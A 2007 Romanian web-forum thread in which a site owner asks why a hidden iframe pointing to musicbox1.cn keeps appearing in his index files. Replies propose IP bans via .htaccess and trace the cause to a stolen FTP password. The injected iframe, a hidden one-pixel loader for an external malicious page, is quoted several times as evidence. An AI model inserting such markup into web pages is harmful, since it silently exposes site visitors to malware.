Jump to content

SUBIECTE NOI
« 1 / 5 »
RSS
Curațare disc vinil

Display cu culori neuniforme

Despre Laborator Defectoscopie Ca...

Mama Clopoțel
 Windows 11 si boxa portabila - de...

Angajarea unei persoane de 18 ani...

Depunere declaratie unica PFA - i...

Situatie mostenire
 Inlocuit/upgrade placa video Nvid...

Google tv si open vpn

Vot europarlamentare

Sfat reparatii Golf 5
 Jurnal de bord Tesla M3SR 2024 Hi...

Acostament sosele comune Romania

AI-ul Google cartografiaza 1 mili...

De ce nu se fac profesori doar ol...
 

muscbox1.cn </iframe> ...

- - - - -
  • Please log in to reply
13 replies to this topic

#1
Thavi

Thavi

    Member

  • Grup: Members
  • Posts: 335
  • Înscris: 29.07.2006
ceva cineva cumva nu stiu cum baga chestia asta in site-urile mele.....
<iframe src='http://musicbox1.cn/iframe.php' width='1' height='1' style='visibility: hidden;'></iframe>

.cn is the country code top-level domain (ccTLD) for the People's Republic of China.


http://whois.domaint...om/musicbox1.cn zice ca  Spektor.ws - RusTelecom.. ceva cu www.nameservers.ru

whatever...

ce tre sa fac sa nu-mi mai bage rusii iframe-uri in cod?
ma poate ajuta cineva? :worthy:  :worthy:  :worthy:

#2
gumball3000

gumball3000

    ...

  • Grup: Senior Members
  • Posts: 49,649
  • Înscris: 24.09.2006
1) sunt chinezi nu rusi :P
2) din moment ce e un host gratuit trebuie sa le iasa si lor ceva, nu ai cum sa stopezi acest lucru

#3
Thavi

Thavi

    Member

  • Grup: Members
  • Posts: 335
  • Înscris: 29.07.2006
poate nu m-am exprimat corect...
luam site-ul X: siteulmeu.ro unde am eu ca orice om normal la cap un index.html/htm/php etc.. da?
buun... site-ul merge perfect... intra lumea e ok.. o data la cateva zile.. in codul lu' index.html asta, apare chestia urmatoare:
<iframe src='http://musicbox1.cn/iframe.php' width='1' height='1' style='visibility: hidden;'></iframe>

fara sa bag yo asa ceva intelegi? ce interes as avea eu sa bag asa ceva..

Quote

1) sunt chinezi nu rusi :P
2) din moment ce e un host gratuit trebuie sa le iasa si lor ceva, nu ai cum sa stopezi acest lucru

1) este un rus care si-a luat site in china...  Registrant Name: Mihail Parfenov
Administrative Email: adresaluidemail [at] mail.ru
nameserver ns1.spektor.ws  unde spektor.ws apartine rustelekom
2) nu e vorba de nici un host gratuit am diverse site-uri pe .com, .ro, deci afirmatia ta este irelevanta... nu cred ca godaddy sau mydomain.ro ar avea vre-un interes sa bage asa ceva in codul clientilor...

a mai patit cineva asa ceva? :cursing:

va rog sa ma ajutati... a inceput google sa bage faze d'alea cu "Acest site poate dauna computerului dvs." m-am saturat sa tot curat codu cel putin odata la 2 zile...

#4
gumball3000

gumball3000

    ...

  • Grup: Senior Members
  • Posts: 49,649
  • Înscris: 24.09.2006
partea asta "Acest site poate dauna computerului dvs." mi s-a intamplat si mie, era de la un worm pe care il aveam in PC, acesta modifica toate fisierele html, in care introducea un cod care lansa o aplicatie malitioasa
daca tu esti sigur ca problema asta nu apare de la tine, ai putea sa incerci sa contactezi tu singur firma de la care ai hosting si sa le explici problema ta

#5
Thavi

Thavi

    Member

  • Grup: Members
  • Posts: 335
  • Înscris: 29.07.2006

View Postgumball3000, on Aug 22 2007, 22:12, said:

partea asta "Acest site poate dauna computerului dvs." mi s-a intamplat si mie, era de la un worm pe care il aveam in PC, acesta modifica toate fisierele html, in care introducea un cod care lansa o aplicatie malitioasa
daca tu esti sigur ca problema asta nu apare de la tine, ai putea sa incerci sa contactezi tu singur firma de la care ai hosting si sa le explici problema ta


nu e vorba de nimic de la mine! am fisierul fara iframeul ala stupid in calc.. si fac replace defiecare data cand e nevoie... de expl acu 2 zile a aparut iframeul ala in codul site-ului... am sters index.html de pe ftp si l-am pus p'asta bun de pe calc (fara iframe). ieri nu am avut nici un iframe pe site.. azi acu vreo 2 ore a aparut iar..   am observat ca iframeul ala intra numai in fisierele numite "index.html" (sau htm, php whatever)

cred ca este vorba de un spider trimis de un mizerabil ca sa se simta si el bine ca a reusit sa bage ui iframe intr-un cod...
cum fac sa-l opresc?

#6
gumball3000

gumball3000

    ...

  • Grup: Senior Members
  • Posts: 49,649
  • Înscris: 24.09.2006
afli ip-ul/ip-urile si il banezi

#7
Thavi

Thavi

    Member

  • Grup: Members
  • Posts: 335
  • Înscris: 29.07.2006
alta varianta nu mai e?

#8
gumball3000

gumball3000

    ...

  • Grup: Senior Members
  • Posts: 49,649
  • Înscris: 24.09.2006
nu prea cred, dar ai putea totusi sa contactezi departamentul de relatii cu clientii de la serviciul de la care ai hosting, pentru ca e clar ca au o "gaura" in securitate

#9
Thavi

Thavi

    Member

  • Grup: Members
  • Posts: 335
  • Înscris: 29.07.2006
pai la godaddy pot sa-l banez din panoul de administrare oferit de ei da la mydomain.ro ce ma fac?

o sa incerc si cu asta... http://www.phpfreaks...de/code/281.php

si am mai citit pe alt forum ca pot bana cu un counter de la bravenet.com dar nu prea am incredere...
mai are cineva alta varianta?
(recapitulare: una bucata site html in care ( presupun ca un spider trimis de) un hacker reuseste sa introduca un mic cod <iframe src='http://musicbox1.cn/iframe.php' width='1' height='1' style='visibility: hidden;'></iframe> .....)
:mellow:

Edited by Thavi, 22 August 2007 - 21:47.


#10
gumball3000

gumball3000

    ...

  • Grup: Senior Members
  • Posts: 49,649
  • Înscris: 24.09.2006
cpanelul de fapt modifica fisierul .htacces dar o face intr-o maniera mai prietenoasa, la mydomain il banezi pur si simplu din fisierul .htacces, cauta pe google pt ca nu mai stiu nici eu exact codul pt ban

#11
Thavi

Thavi

    Member

  • Grup: Members
  • Posts: 335
  • Înscris: 29.07.2006

View Postgumball3000, on Aug 22 2007, 22:48, said:

cpanelul de fapt modifica fisierul .htacces dar o face intr-o maniera mai prietenoasa, la mydomain il banezi pur si simplu din fisierul .htacces, cauta pe google pt ca nu mai stiu nici eu exact codul pt ban


http://www.webmaster...php/3380075.htm

am mai gasit si varianta asta.. oricum daca intra cu proxy n-am rezolvat nimic.. dar oricum nu cred ca este o persoana cred ca este un spider care face chestia asta automat...



Quote

Banning IP Addresses Using .htaccess
> > > Must use a Html Text Editor.

> Step One
Add this to your .htaccess file at the root www directory, in other words, don't overwrite the existing file.

<Files 403.shtml>
order allow,deny
allow from all
</Files>


> Step Two
Add the IP's to Ban.

deny from 69.42.67.196
deny from 4.79.248.8


One line for each IP address preceded by " deny from "


sa vedem daca mai intra dupa ce fac .htaccess

#12
DjAdi

DjAdi

    Active Member

  • Grup: Members
  • Posts: 1,535
  • Înscris: 17.03.2003
Am vazut la mai multi problema asta, din cate am gasit pe net este vorba de un troian rusesc:

http://www.one.ro/page.php?id=387

http://www.abnet.ro/...t/view/477/287/

#13
DarK4EveR

DarK4EveR

    New Member

  • Grup: Members
  • Posts: 13
  • Înscris: 03.04.2007
Daca tu spui ca doar index.html/php/htm este modificat, atunci fa`i un index.php in care nu faci decat un redirect catre mypage.html( care sa fie index.html ). Si atunci nu cred ca ar trebui sa mai ai probleme. Asta ar fi o solutie temporara, asa cum au zis si ceilalti, discuta cu compania de hosting, problema de securitate trebuie rezolvata.

#14
DjAdi

DjAdi

    Active Member

  • Grup: Members
  • Posts: 1,535
  • Înscris: 17.03.2003
Problema este pe calculatorul de unde accesezi FTP-ul siteului, ti s-a furat parola, schimba parola si nu o mai lasa salvata in calculator, foloseste un firewall puternic si scaneaza dupa troieni prin calculator.

Anunturi

Second Opinion Second Opinion

Folosind serviciul second opinion ne puteți trimite RMN-uri, CT -uri, angiografii, fișiere .pdf, documente medicale.

Astfel vă vom putea da o opinie neurochirurgicală, fără ca aceasta să poată înlocui un consult de specialitate. Răspunsurile vor fi date prin e-mail în cel mai scurt timp posibil (de obicei în mai putin de 24 de ore, dar nu mai mult de 48 de ore). Second opinion – Neurohope este un serviciu gratuit.

www.neurohope.ro

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

Forumul Softpedia foloseste "cookies" pentru a imbunatati experienta utilizatorilor Accept
Pentru detalii si optiuni legate de cookies si datele personale, consultati Politica de utilizare cookies si Politica de confidentialitate